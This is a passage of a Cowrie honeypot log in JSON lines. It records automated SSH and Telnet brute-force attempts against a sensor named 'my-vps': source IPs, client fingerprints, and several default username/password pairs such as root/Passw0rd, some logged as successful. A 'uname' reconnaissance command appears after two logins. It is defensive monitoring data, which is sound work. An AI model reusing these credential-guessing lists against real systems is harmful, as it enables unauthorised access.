-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:06.003731Z","src_ip":"45.125.211.194","session":"b73b300b9776"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49837,"dst_ip":"1.2.3.4","dst_port":23,"session":"f1398faf405f","protocol":"telnet","message":"New connection: 212.227.125.160:49837 (1.2.3.4:23) [session: f1398faf405f]","sensor":"my-vps","timestamp":"2025-08-28T03:32:06.325630Z"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:06.390398Z","src_ip":"212.227.125.160","session":"173af8981fb2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:06.871817Z","src_ip":"45.125.211.194","session":"b73b300b9776"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":40158,"dst_ip":"1.2.3.4","dst_port":22,"session":"19646cbd4b57","protocol":"ssh","message":"New connection: 194.233.79.134:40158 (1.2.3.4:22) [session: 19646cbd4b57]","sensor":"my-vps","timestamp":"2025-08-28T03:32:07.591328Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:07.615657Z","src_ip":"212.227.125.160","session":"173af8981fb2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:07.806215Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:08.093177Z","src_ip":"45.125.211.194","session":"b73b300b9776"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:08.356139Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48820,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ba2ada2f2a","protocol":"ssh","message":"New connection: 212.227.125.160:48820 (1.2.3.4:22) [session: c1ba2ada2f2a]","sensor":"my-vps","timestamp":"2025-08-28T03:32:10.209373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:10.210041Z","src_ip":"212.227.125.160","session":"c1ba2ada2f2a"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:32:10.236043Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:10.428663Z","src_ip":"212.227.125.160","session":"c1ba2ada2f2a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:32:11.099640Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:32:11.100311Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:11.102081Z","src_ip":"212.227.125.160","session":"c1ba2ada2f2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:11.307185Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:11.308273Z","src_ip":"194.233.79.134","session":"19646cbd4b57"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:12.322513Z","src_ip":"212.227.125.160","session":"c1ba2ada2f2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59704,"dst_ip":"1.2.3.4","dst_port":22,"session":"908e45116245","protocol":"ssh","message":"New connection: 212.227.235.229:59704 (1.2.3.4:22) [session: 908e45116245]","sensor":"my-vps","timestamp":"2025-08-28T03:32:13.040571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:13.041440Z","src_ip":"212.227.235.229","session":"908e45116245"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:13.295117Z","src_ip":"212.227.235.229","session":"908e45116245"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:14.057909Z","src_ip":"212.227.235.229","session":"908e45116245"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:15.313837Z","src_ip":"212.227.235.229","session":"908e45116245"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":49515,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f21c050ba75","protocol":"ssh","message":"New connection: 45.125.211.194:49515 (1.2.3.4:22) [session: 2f21c050ba75]","sensor":"my-vps","timestamp":"2025-08-28T03:32:20.526243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:20.541897Z","src_ip":"45.125.211.194","session":"2f21c050ba75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:20.742857Z","src_ip":"45.125.211.194","session":"2f21c050ba75"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:21.568381Z","src_ip":"45.125.211.194","session":"2f21c050ba75"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:22.779325Z","src_ip":"45.125.211.194","session":"2f21c050ba75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52352,"dst_ip":"1.2.3.4","dst_port":22,"session":"f37e2e2d6240","protocol":"ssh","message":"New connection: 212.227.235.229:52352 (1.2.3.4:22) [session: f37e2e2d6240]","sensor":"my-vps","timestamp":"2025-08-28T03:32:24.546541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:24.547381Z","src_ip":"212.227.235.229","session":"f37e2e2d6240"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:24.798220Z","src_ip":"212.227.235.229","session":"f37e2e2d6240"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:25.556643Z","src_ip":"212.227.235.229","session":"f37e2e2d6240"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:26.811729Z","src_ip":"212.227.235.229","session":"f37e2e2d6240"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51991,"dst_ip":"1.2.3.4","dst_port":22,"session":"791dc57b8ca3","protocol":"ssh","message":"New connection: 45.125.211.194:51991 (1.2.3.4:22) [session: 791dc57b8ca3]","sensor":"my-vps","timestamp":"2025-08-28T03:32:35.294120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:35.301517Z","src_ip":"45.125.211.194","session":"791dc57b8ca3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:35.516036Z","src_ip":"45.125.211.194","session":"791dc57b8ca3"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:36.402738Z","src_ip":"45.125.211.194","session":"791dc57b8ca3"}
{"eventid":"cowrie.session.closed","duration":30.38836407661438,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:36.713921Z","src_ip":"212.227.125.160","session":"f1398faf405f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:37.625767Z","src_ip":"45.125.211.194","session":"791dc57b8ca3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46126,"dst_ip":"1.2.3.4","dst_port":22,"session":"988a9699c9c4","protocol":"ssh","message":"New connection: 212.227.235.229:46126 (1.2.3.4:22) [session: 988a9699c9c4]","sensor":"my-vps","timestamp":"2025-08-28T03:32:42.330518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:32:42.341674Z","src_ip":"212.227.235.229","session":"988a9699c9c4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:32:42.433311Z","src_ip":"212.227.235.229","session":"988a9699c9c4"}
{"eventid":"cowrie.login.failed","username":"ali","password":"123456","message":"login attempt [ali/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:42.822878Z","src_ip":"212.227.235.229","session":"988a9699c9c4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:43.919092Z","src_ip":"212.227.235.229","session":"988a9699c9c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54990,"dst_ip":"1.2.3.4","dst_port":22,"session":"2393ad121dea","protocol":"ssh","message":"New connection: 212.227.125.160:54990 (1.2.3.4:22) [session: 2393ad121dea]","sensor":"my-vps","timestamp":"2025-08-28T03:32:45.088150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:45.089182Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:45.306638Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:32:45.956559Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:32:46.406806Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:32:46.407505Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:46.625140Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:46.626322Z","src_ip":"212.227.125.160","session":"2393ad121dea"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":46317,"dst_ip":"1.2.3.4","dst_port":22,"session":"937ad38f3dd7","protocol":"ssh","message":"New connection: 45.125.211.194:46317 (1.2.3.4:22) [session: 937ad38f3dd7]","sensor":"my-vps","timestamp":"2025-08-28T03:32:50.093447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:50.109201Z","src_ip":"45.125.211.194","session":"937ad38f3dd7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.